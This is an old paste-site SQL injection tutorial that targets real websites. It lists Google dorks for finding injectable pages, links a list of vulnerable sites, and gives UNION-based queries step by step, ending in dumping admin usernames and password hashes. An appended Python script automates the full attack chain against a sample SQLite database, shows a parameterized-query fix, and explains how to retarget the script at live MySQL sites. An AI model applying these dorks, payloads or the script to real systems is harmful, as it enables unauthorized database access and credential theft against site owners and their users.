Hailedcap

SQLI tutorial(good)

Nov 22nd, 2011
If you want to support me in making more tutorials, it only costs 5 seconds of your life :-) and you get to see many more tutorials (Y)

http://adf.ly/3pnxG

Visit this site also :-)

http://acttodaynow.blogspot.com/

Thank you <3

Introduction:

SQLi (SQL injection, or Structured Query Language injection) is the first step most people take into exploiting websites. It is easy to do and a great starting-off point. Unfortunately most SQLi tutorials suck, so that is why I am writing this one. SQLi is basically what happens when a site pastes something you control, such as a URL parameter, straight into a database query without parameterizing or escaping it: you can then change the query the database runs, either to pull data out of the database or to alter a login query and bypass authentication as an admin.

Finding Sites to Inject:

Finding SQLi-vulnerable sites is extremely easy; all you need to do is some googling. The first thing you need to do is find some dorks (search strings that match URLs with a parameter that is usually fed straight into a query).

SQLI DORKS:
Code:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:SHOW.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-VIEW.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:SQL.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:INDEX.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:READ.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:VIEW.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:INDEX.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:SECTION.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:news-FULL.php?id=
inurl:news_display.php?getid=
inurl:index2.php?OPTION=
inurl:material.php?id=
inurl:viewapp.php?id=
inurl:galeri_info.php?l=
inurl:iniziativa.php?IN=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:detail_new.php?id=
inurl:hotel.php?id=
inurl:ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: UNKNOWN()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()

Pick one of those dorks, add inurl: before it if it does not already have it,
and copy and paste it into Google. Pick one of the sites Google returns and open it.
For example, the URL of the page you land on may look like this:

Code:
http://www.example.com/index.php?id=3

To check whether it is vulnerable, all you have to do is
put a ' at the end of the URL. So now your URL should
look like this:
Code:
http://www.example.com/index.php?id=3'

Press enter. If the quote reaches the query unescaped, the statement the site runs
becomes WHERE id=3', the database rejects it, and many sites print that database
error straight onto the page. The wording varies, but it should look something like this:

http://i982.photobucket.com/albums/ae308/blink1337/1.png

If you get a database error, that site is vulnerable: the parameter is being pasted into
the query as-is. Two things to keep in mind: an error page the site generates itself (a
"not found" page, a redirect) is not a SQL error, so read it before moving on; and a site
that shows no error is not necessarily safe, it may just be hiding them. Comparing id=3
with id=3+and+1=1 (same page) and id=3+and+1=2 (empty or different page) reveals the
injection without any error message at all.

Also, if you are lazy you can check
my list of vulnerable sites here:

http://allianceforums.co.cc/forums/thread-1249.html

Getting Number of Columns

After you find your vulnerable site, the first step is to find the number of columns
the page's query returns; the UNION SELECT used in the next step only works if it supplies
exactly that many. The easiest way to do this is the "ORDER BY" statement: ORDER BY n sorts
by the n-th column and errors as soon as n is bigger than the number of columns. All you
have to do is put ORDER BY (number)-- at the end of your URL, so it looks like this:

Code:
http://www.example.com/index.php?id=3 ORDER BY (number)--

You want to start with ORDER BY 1-- and keep increasing the number by 1 until you get an error.
(MySQL only treats -- as a comment when a space follows it; if plain -- does not work,
use --+ or -- - so a space gets through the URL, or %23, which is a #.)

For example

Code:
http://www.example.com/index.php?id=3 order by 1--
http://www.example.com/index.php?id=3 order by 2--
http://www.example.com/index.php?id=3 order by 3--
http://www.example.com/index.php?id=3 order by 4--
http://www.example.com/index.php?id=3 order by 5--
http://www.example.com/index.php?id=3 order by 6--
http://www.example.com/index.php?id=3 order by 7--
http://www.example.com/index.php?id=3 order by 8--

Let's say on order by 8-- you get an error page. This means that the query has 7 columns, because
it will give you errors on anything over 7. If you have a bad memory, open notepad and
write down the number of columns you find.

Finding Accessible Columns

Now that we have the number of columns, we need to find which of them are actually printed on the page,
because those are the only ones we can read data through. We do this with "UNION" "SELECT" and the number
of columns, put together in the URL like this:
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

For the end part of the URL (1,2,3,4,5,6,7) you list one number for each column
you found in the first step. Since I found that the site I was testing had 7
columns I put 1,2,3,4,5,6,7. Also remember to put a - in front of the id number: id=-3 matches
no real row, so the only row left for the page to display is the one our SELECT adds, and the
numbers appear where the article normally would. After you do that you should get something like this...

The page should look a bit fucked up and there should be 2 numbers on the page.
These two numbers are the column positions we can get information from. We will replace them with expressions later on, so
write them down or remember them.

Finding MySQL Database Version

The reason you need the database version is to see whether or not the website is worth your time:
MySQL below 5 has no information_schema, so you would have to blindly guess the table and column names.
If you are a beginner and you find that the database is below 5, I urge you to find
a different site.

Now we take one of the numbers that showed up on the page in the step above and replace it with @@version
(version() does the same). For example, before our URL looked like this:
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Now we replace the 1 with @@version:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--
Press enter and the page should now display the version number where the 1 was.

The site that I am testing has a version number of 5.0.45. Since this number is 5 or above we will continue working on
this site.

Finding Database Names

Next we are going to inject the website to find the database names. We do this by replacing @@version
with group_concat(schema_name) and adding +from+information_schema.schemata-- after the last number in our URL.
So now our URL should look like this:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+from+information_schema.schemata--

It will list the database names; group_concat joins all the rows into one comma-separated string so they
fit in the single visible column. Now to find which one is currently in use, replace group_concat(schema_name) with
concat(database()) (plain database() works too) and delete +from+information_schema.schemata. So the URL should now look like this:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
It will display which database is in use. You may want to write it down.

Finding Table Names

To get the table names of the current database, replace concat(database()) with group_concat(table_name)
and add from information_schema.tables where table_schema=database() between the last number and the --.
From here on I write the URL with spaces instead of + signs; either works, the browser encodes the spaces.
Now your URL should look like this:

Code:
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

The page should now show the table names. You may want to write them down.

http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.png

Finding Column Names

This is exactly like getting table names: you just change table_name to column_name and information_schema.tables to information_schema.columns.
So your URL should look like this:

Code:
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

This gives you the column names of every table in the database at once. If that is too much to read, append
and table_name='tablename' to the where clause to get the columns of one table (if the site strips quotes,
write the name as hex instead: 0x745f61646d696e is t_admin). You may want to write them down.

Let's say it gave us back the column names

admin_username
admin_password

Getting Information

Now that we have the database name, table names and column names, we can put them together and
pull information out of them. To do this we need to put the following in our URL:
Code:
http://www.example.com/index.php?id=-3 union select group_concat(columnname,0x3a,columnname),2,3,4,5,6,7 from databasename.tablename--

Now replace columnname with the column names you want information from. The 0x3a is the hex of a : and separates
the columns for you; group_concat puts a comma between rows. Put in as many column names as you want, but stick to the
format, and keep the total number of items in the select at the column count you found (the group_concat(...) takes
the place of the visible number). Also replace databasename.tablename
with the database name and the table name the columns were in. After all this your URL should look something
like this:

Code:
http://www.example.com/index.php?id=-3 union select group_concat(admin_username,0x3a,admin_password),2,3,4,5,6,7 from whippit.t_admin--

Now you should get the usernames and passwords of the admins, or whatever information you wanted to get.
Two things to expect: passwords are usually stored as hashes, so what comes back still has to be cracked;
and group_concat output is cut off at 1024 characters by default, so on a big table drop the group_concat,
use concat(admin_username,0x3a,admin_password) instead and add limit 0,1, then limit 1,1, and so on after
the table name to read one row at a time.

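The whole procedure above, from the quote probe in "Finding Sites to Inject" through the dump in "Getting Information", as one added example. This is my code, not part of the tutorial, and it runs against a constructed in-memory SQLite database (a 7-column news table and a t_admin table with made-up rows) so it works offline. SQLite has no @@version or information_schema, so sqlite_version(), sqlite_master and pragma_table_info() stand in for them, || stands in for concat with 0x3a, and render() is a stand-in for a page template that only prints two of the seven columns; the names vulnerable_page, safe_page, extract and run_attack are mine. vulnerable_page builds the query the way the tutorial's targets do; safe_page is the same query with a bound parameter, which is the fix, and the attack returns None against it.

```python
import sqlite3

# Added example, not from the tutorial. SQLite stands in for the target's
# MySQL, so sqlite_version(), sqlite_master and pragma_table_info() are used
# where the tutorial uses @@version and information_schema, and || replaces
# concat(...,0x3a,...). Table/column names follow the tutorial; rows are made up.

def build_db():
    """Constructed sample database: a 7-column news table and an admin table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT,
                           views INTEGER, cat TEXT, posted TEXT);
        INSERT INTO news VALUES (3, 'Hello', 'first post', 'ed', 10, 'misc', '2011-11-22');
        CREATE TABLE t_admin (admin_username TEXT, admin_password TEXT);
        INSERT INTO t_admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO t_admin VALUES ('editor', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db

def render(rows):
    """Stand-in for the HTML template: only title and body (columns 2 and 3) are printed."""
    return "\n".join(f"{r[1]}: {r[2]}" for r in rows)

def vulnerable_page(db, id_param):
    """index.php?id=... the way the tutorial's targets build it: id glued into the SQL text."""
    sql = ("SELECT id, title, body, author, views, cat, posted FROM news "
           f"WHERE id={id_param}")
    return render(db.execute(sql).fetchall())

def safe_page(db, id_param):
    """The fix: a bound parameter. The id is sent as data and can never become SQL."""
    sql = "SELECT id, title, body, author, views, cat, posted FROM news WHERE id=?"
    return render(db.execute(sql, (id_param,)).fetchall())

def quote_probe(page, db):
    """Step 1: append a quote. A database error means the input reached the query raw."""
    try:
        page(db, "3'")
        return False
    except sqlite3.OperationalError:
        return True

def count_columns(page, db, limit=20):
    """Step 2: ORDER BY n succeeds while n <= column count and errors one past it."""
    for n in range(1, limit + 1):
        try:
            page(db, f"3 ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None

def visible_columns(page, db, ncols):
    """Step 3: UNION SELECT a distinct marker per column; the markers printed are usable slots."""
    markers = ",".join(f"'#{i}#'" for i in range(1, ncols + 1))
    html = page(db, f"-3 UNION SELECT {markers}--")
    return [i for i in range(1, ncols + 1) if f"#{i}#" in html]

def extract(page, db, ncols, slot, expr, from_clause=""):
    """Steps 4 onward: put an expression in a visible slot and cut its value out of the page."""
    cols = [f"'#{i}#'" for i in range(1, ncols + 1)]
    cols[slot - 1] = f"'<<'||({expr})||'>>'"
    html = page(db, f"-3 UNION SELECT {','.join(cols)} {from_clause}--")
    return html.split("<<", 1)[1].split(">>", 1)[0]

def run_attack(page, db):
    """Run the whole tutorial against a page function; None if the quote probe comes back clean."""
    if not quote_probe(page, db):
        return None
    ncols = count_columns(page, db)
    slot = visible_columns(page, db, ncols)[0]
    return {
        "columns": ncols,
        "visible": visible_columns(page, db, ncols),
        # @@version on MySQL
        "version": extract(page, db, ncols, slot, "sqlite_version()"),
        # group_concat(table_name) from information_schema.tables where table_schema=database()
        "tables": extract(page, db, ncols, slot, "group_concat(name)",
                          "FROM sqlite_master WHERE type='table'"),
        # group_concat(column_name) from information_schema.columns where table_name='t_admin'
        "admin_columns": extract(page, db, ncols, slot, "group_concat(name)",
                                 "FROM pragma_table_info('t_admin')"),
        # group_concat(admin_username,0x3a,admin_password) from whippit.t_admin
        "creds": extract(page, db, ncols, slot,
                         "group_concat(admin_username||':'||admin_password)",
                         "FROM t_admin"),
    }

if __name__ == "__main__":
    db = build_db()
    print(run_attack(vulnerable_page, db))  # full dump
    print(run_attack(safe_page, db))        # None: the parameterized query is not injectable
```

Run it with python3 and nothing else installed. Against a real MySQL target the only parts that change are the expressions passed to extract (use the tutorial's @@version and information_schema queries) and the function that fetches the page; the probe, column count and marker logic are the same.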